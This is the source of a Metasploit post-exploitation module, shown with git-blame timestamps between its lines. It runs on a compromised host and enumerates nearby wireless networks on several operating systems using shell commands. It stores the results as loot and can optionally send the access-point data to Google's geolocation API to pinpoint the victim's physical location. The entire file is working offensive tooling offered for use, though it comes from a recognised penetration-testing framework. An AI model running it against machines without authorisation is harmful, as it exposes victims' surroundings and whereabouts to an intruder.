2014-04-19 22:31:48 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-04-19 22:31:48 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2015-08-16 00:49:32 +00:00
|
|
|
require 'rex/google/geolocation'
|
2014-04-19 22:31:48 +00:00
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2014-04-19 22:31:48 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
2014-04-24 12:04:50 +00:00
|
|
|
'Name' => 'Multiplatform WLAN Enumeration and Geolocation',
|
|
|
|
'Description' => %q{ Enumerate wireless networks visible to the target device.
|
|
|
|
Optionally geolocate the target by gathering local wireless networks and
|
|
|
|
performing a lookup against Google APIs.},
|
2014-04-19 22:31:48 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2014-07-11 17:45:23 +00:00
|
|
|
'Author' => [ 'Tom Sellers <tom[at]fadedcode.net>'],
|
2014-04-24 12:04:50 +00:00
|
|
|
'Platform' => %w{ osx win linux bsd solaris },
|
2014-04-19 22:31:48 +00:00
|
|
|
'SessionTypes' => [ 'meterpreter', 'shell' ],
|
|
|
|
))
|
|
|
|
|
2014-04-24 12:04:50 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptBool.new('GEOLOCATE', [ false, 'Use Google APIs to geolocate Linux, Windows, and OS X targets.', false])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2014-04-24 12:04:50 +00:00
|
|
|
|
2014-04-19 22:31:48 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def get_strength(quality)
|
|
|
|
# Convert the signal quality to signal strength (dbm) to be sent to
|
|
|
|
# Google. Docs indicate this should subtract 100 instead of the 95 I
|
|
|
|
# am using here, but in practice 95 seems to be closer.
|
|
|
|
signal_str = quality.to_i / 2
|
|
|
|
signal_str = (signal_str - 95).round
|
|
|
|
return signal_str
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse_wireless_win(listing)
|
2015-07-21 01:24:07 +00:00
|
|
|
wlan_list = []
|
2014-04-19 22:31:48 +00:00
|
|
|
raw_networks = listing.split("\r\n\r\n")
|
|
|
|
|
2015-07-21 00:40:25 +00:00
|
|
|
raw_networks.each do |network|
|
2014-04-19 22:31:48 +00:00
|
|
|
details = network.match(/^SSID [\d]+ : ([^\r\n]*).*?BSSID 1[\s]+: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal[\s]+: ([\d]{1,3})%/m)
|
2015-07-21 00:40:25 +00:00
|
|
|
if !details.nil?
|
|
|
|
strength = get_strength(details[3])
|
2015-07-21 01:24:07 +00:00
|
|
|
wlan_list << [ details[2], details[1], strength ]
|
2015-07-21 00:40:25 +00:00
|
|
|
end
|
|
|
|
end
|
2014-04-19 22:31:48 +00:00
|
|
|
|
|
|
|
return wlan_list
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def parse_wireless_linux(listing)
|
2015-07-21 01:24:07 +00:00
|
|
|
wlan_list = []
|
2014-04-19 22:31:48 +00:00
|
|
|
raw_networks = listing.split("Cell ")
|
|
|
|
|
2015-07-21 00:40:25 +00:00
|
|
|
raw_networks.each do |network|
|
2014-04-19 22:31:48 +00:00
|
|
|
details = network.match(/^[\d]{1,4} - Address: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal level=([\d-]{1,3}).*?ESSID:"([^"]*)/m)
|
2015-07-21 00:40:25 +00:00
|
|
|
if !details.nil?
|
2015-07-21 01:24:07 +00:00
|
|
|
wlan_list << [ details[1], details[3], details[2] ]
|
2015-07-21 00:40:25 +00:00
|
|
|
end
|
|
|
|
end
|
2014-04-19 22:31:48 +00:00
|
|
|
|
|
|
|
return wlan_list
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse_wireless_osx(listing)
|
2015-07-21 01:24:07 +00:00
|
|
|
wlan_list = []
|
2014-04-19 22:31:48 +00:00
|
|
|
raw_networks = listing.split("\n")
|
|
|
|
|
2015-07-21 00:40:25 +00:00
|
|
|
raw_networks.each do |network|
|
2014-04-19 22:31:48 +00:00
|
|
|
network = network.strip
|
|
|
|
details = network.match(/^(.*(?!\h\h:))[\s]*([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2})[\s]*([\d-]{1,3})/)
|
2015-07-21 00:40:25 +00:00
|
|
|
if !details.nil?
|
2015-07-21 01:24:07 +00:00
|
|
|
wlan_list << [ details[2], details[1], details[3] ]
|
2015-07-21 00:40:25 +00:00
|
|
|
end
|
|
|
|
end
|
2014-04-19 22:31:48 +00:00
|
|
|
|
|
|
|
return wlan_list
|
|
|
|
end
|
|
|
|
|
2014-04-24 12:04:50 +00:00
|
|
|
def perform_geolocation(wlan_list)
|
|
|
|
if wlan_list.blank?
|
|
|
|
print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.")
|
|
|
|
return
|
|
|
|
end
|
2015-08-16 00:49:32 +00:00
|
|
|
g = Rex::Google::Geolocation.new
|
2014-04-24 12:04:50 +00:00
|
|
|
|
2015-07-21 01:24:07 +00:00
|
|
|
wlan_list.each do |wlan|
|
|
|
|
g.add_wlan(*wlan)
|
|
|
|
end
|
|
|
|
|
|
|
|
begin
|
|
|
|
g.fetch!
|
|
|
|
rescue RuntimeError => e
|
|
|
|
print_error("Error: #{e}")
|
2014-04-24 12:04:50 +00:00
|
|
|
else
|
2015-07-21 01:24:07 +00:00
|
|
|
print_status(g.to_s)
|
|
|
|
print_status("Google Maps URL: #{g.google_maps_url}")
|
2014-04-24 12:04:50 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2014-04-19 22:31:48 +00:00
|
|
|
|
|
|
|
# Run Method for when run command is issued
|
|
|
|
def run
|
2016-03-18 04:26:12 +00:00
|
|
|
case session.platform
|
2016-10-29 04:59:05 +00:00
|
|
|
when 'windows'
|
2014-04-19 22:31:48 +00:00
|
|
|
listing = cmd_exec('netsh wlan show networks mode=bssid')
|
|
|
|
if listing.nil?
|
2014-04-24 12:04:50 +00:00
|
|
|
print_error("Unable to generate wireless listing.")
|
2014-04-19 22:31:48 +00:00
|
|
|
return nil
|
|
|
|
else
|
|
|
|
store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
|
2014-04-24 12:04:50 +00:00
|
|
|
# The wireless output does not lend itself to displaying on screen for this platform.
|
|
|
|
print_status("Wireless list saved to loot.")
|
|
|
|
if datastore['GEOLOCATE']
|
|
|
|
wlan_list = parse_wireless_win(listing)
|
|
|
|
perform_geolocation(wlan_list)
|
|
|
|
return
|
|
|
|
end
|
2014-04-19 22:31:48 +00:00
|
|
|
end
|
|
|
|
|
2016-10-29 04:59:05 +00:00
|
|
|
when 'osx'
|
2014-04-19 22:31:48 +00:00
|
|
|
listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s')
|
|
|
|
if listing.nil?
|
2014-04-24 12:04:50 +00:00
|
|
|
print_error("Unable to generate wireless listing.")
|
2014-04-19 22:31:48 +00:00
|
|
|
return nil
|
|
|
|
else
|
|
|
|
store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
|
2014-04-24 12:04:50 +00:00
|
|
|
print_status("Target's wireless networks:\n\n#{listing}\n")
|
|
|
|
if datastore['GEOLOCATE']
|
|
|
|
wlan_list = parse_wireless_osx(listing)
|
|
|
|
perform_geolocation(wlan_list)
|
|
|
|
return
|
|
|
|
end
|
2014-04-19 22:31:48 +00:00
|
|
|
end
|
|
|
|
|
2016-10-29 04:59:05 +00:00
|
|
|
when 'linux'
|
2014-04-19 22:31:48 +00:00
|
|
|
listing = cmd_exec('iwlist scanning')
|
|
|
|
if listing.nil?
|
2014-04-24 12:04:50 +00:00
|
|
|
print_error("Unable to generate wireless listing.")
|
2014-04-19 22:31:48 +00:00
|
|
|
return nil
|
|
|
|
else
|
|
|
|
store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
|
2014-04-24 12:04:50 +00:00
|
|
|
# The wireless output does not lend itself to displaying on screen for this platform.
|
|
|
|
print_status("Wireless list saved to loot.")
|
|
|
|
if datastore['GEOLOCATE']
|
|
|
|
wlan_list = parse_wireless_linux(listing)
|
|
|
|
perform_geolocation(wlan_list)
|
|
|
|
return
|
|
|
|
end
|
2014-04-19 22:31:48 +00:00
|
|
|
end
|
|
|
|
|
2016-10-29 04:59:05 +00:00
|
|
|
when 'solaris'
|
2014-04-24 12:04:50 +00:00
|
|
|
listing = cmd_exec('dladm scan-wifi')
|
|
|
|
if listing.blank?
|
|
|
|
print_error("Unable to generate wireless listing.")
|
|
|
|
return nil
|
|
|
|
else
|
|
|
|
store_loot("host.solaris.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
|
|
|
|
print_status("Target's wireless networks:\n\n#{listing}\n")
|
|
|
|
print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE']
|
|
|
|
return
|
|
|
|
end
|
2014-04-19 22:31:48 +00:00
|
|
|
|
2016-10-29 04:59:05 +00:00
|
|
|
when 'bsd'
|
2014-04-24 12:04:50 +00:00
|
|
|
interface = cmd_exec("dmesg | grep -i wlan | cut -d ':' -f1 | uniq")
|
|
|
|
# Printing interface as this platform requires the interface to be specified
|
|
|
|
# it might not be detected correctly.
|
|
|
|
print_status("Found wireless interface: #{interface}")
|
|
|
|
listing = cmd_exec("ifconfig #{interface} scan")
|
|
|
|
if listing.blank?
|
|
|
|
print_error("Unable to generate wireless listing.")
|
|
|
|
return nil
|
|
|
|
else
|
|
|
|
store_loot("host.bsd.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks")
|
|
|
|
print_status("Target's wireless networks:\n\n#{listing}\n")
|
|
|
|
print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE']
|
|
|
|
return
|
|
|
|
end
|
2014-04-19 22:31:48 +00:00
|
|
|
|
|
|
|
else
|
2014-04-24 12:04:50 +00:00
|
|
|
print_error("The target's platform, #{platform}, is not supported at this time.")
|
|
|
|
return nil
|
2014-04-19 22:31:48 +00:00
|
|
|
end
|
|
|
|
|
2015-07-21 00:40:25 +00:00
|
|
|
rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("The following Error was encountered: #{e.class} #{e}")
|
|
|
|
end
|
2014-04-19 22:31:48 +00:00
|
|
|
|
|
|
|
|
|
|
|
end
|